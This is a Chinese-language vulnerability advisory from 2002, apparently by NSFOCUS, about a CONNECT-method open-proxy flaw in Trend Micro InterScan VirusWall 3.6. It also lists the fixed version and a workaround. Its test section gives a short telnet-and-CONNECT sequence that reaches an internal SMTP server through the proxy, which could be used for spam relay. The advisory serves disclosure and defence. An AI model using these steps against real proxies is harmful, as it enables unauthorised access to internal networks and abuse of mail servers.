发布日期：2002-12-09
更新日期：2002-12-16

受影响系统：

Trend Micro InterScan VirusWall 3.6 Build 1182
Trend Micro InterScan VirusWall 3.6

不受影响系统：

Trend Micro InterScan VirusWall 3.7 Build 1190

描述：

---

BUGTRAQ  ID: 6321

Trend Micro InterScan VirusWall是由趋势科技开发和维护的网关防病毒软件，包括对EMAIL、FTP、HTTP的病毒防护。

Trend Micro InterScan VirusWall不正确处理CONNECT方法连接代理，远程攻击者可以利用这个漏洞未授权通过代理访问内部网络。

使用CONNECT方法连接ISVW HTTP代理服务器，可以未授权访问代理服务器后保护的主机，攻击者可以利用这个问题获得内部网络拓扑，滥用网络资源等非法活动。

<*来源：Volker Tanger （volker.tanger@discon.de）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=103910872431613&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Volker Tanger （volker.tanger@discon.de）提供了如下测试方法：

you = 6.6.6.666
Trendmicro ISVW = 1.1.1.1  (http proxy at port 80)
Internal Mailserver = 2.2.2.2

connect with "telnet 1.1.1.1 80" to ISVW proxy and enter
CONNECT 2.2.2.2:25 / HTTP/1.0

response: mail server banner - and running SMTP session e.g. to send SPAM from.

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 暂时关闭HTTP代理服务器。

厂商补丁：

Trend Micro
-----------
Trend Micro InterScan VirusWall 3.7 Builds 1190及之后的版本不存在此漏洞，用户可以联系供应商获得升级详细信息：

http://www.trend.com.tw

浏览次数：2661
严重程度：0（网友投票）